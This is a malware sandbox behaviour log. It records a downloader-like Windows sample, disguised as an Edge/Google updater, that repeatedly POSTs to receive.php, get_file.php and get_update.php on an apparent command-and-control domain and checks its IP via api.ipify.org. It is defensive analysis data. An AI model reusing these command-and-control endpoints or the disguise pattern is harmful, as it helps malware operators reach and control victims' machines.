Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Jump to behavior

Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52934 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52966 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52928 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 172.67.74.152:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52925 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52964 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52958 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52953 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52937 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52960 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52932 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52972 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52955 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52942 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52967 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52918 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52923 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52939 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52948 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52950 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52926 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52974 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52944 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:52969 -> 104.26.12.205:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: yalubluseks.eu
Source: global traffic	DNS traffic detected: DNS query: 57.122.6.0.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continueConnection: Keep-Alive

Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://api.ipify.org
Source: LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgD
Source: LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: LKMService.exe, 00000002.00000002.4677000904.00000000058B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yalubluseks.eu
Source: LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://yalubluseks.eud
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: https://pidgin.im0
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu
Source: file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	String found in binary or memory: https://yalubluseks.eu/
Source: LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_filT
Source: LKMService.exe, 00000002.00000002.4661088450.000000000246A000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000024E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_file.php
Source: LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_updatX
Source: LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000024E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_update.php
Source: LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_update.phpT
Source: LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/receiPt
Source: LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.000000000246A000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000024E3000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/receive.php
Source: LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/t
Source: LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.euD

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52954
Source: unknown	Network traffic detected: HTTP traffic on port 52949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52959
Source: unknown	Network traffic detected: HTTP traffic on port 52970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52952
Source: unknown	Network traffic detected: HTTP traffic on port 52959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52951
Source: unknown	Network traffic detected: HTTP traffic on port 52935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52919
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 52975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52927
Source: unknown	Network traffic detected: HTTP traffic on port 52954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52961
Source: unknown	Network traffic detected: HTTP traffic on port 52979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52962
Source: unknown	Network traffic detected: HTTP traffic on port 52938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52929
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52979
Source: unknown	Network traffic detected: HTTP traffic on port 52976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52933
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52938
Source: unknown	Network traffic detected: HTTP traffic on port 52930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52936
Source: unknown	Network traffic detected: HTTP traffic on port 52920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52971
Source: unknown	Network traffic detected: HTTP traffic on port 52957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52973
Source: unknown	Network traffic detected: HTTP traffic on port 52962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52943
Source: unknown	Network traffic detected: HTTP traffic on port 52973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52949
Source: unknown	Network traffic detected: HTTP traffic on port 52929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52981
Source: unknown	Network traffic detected: HTTP traffic on port 52921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52980
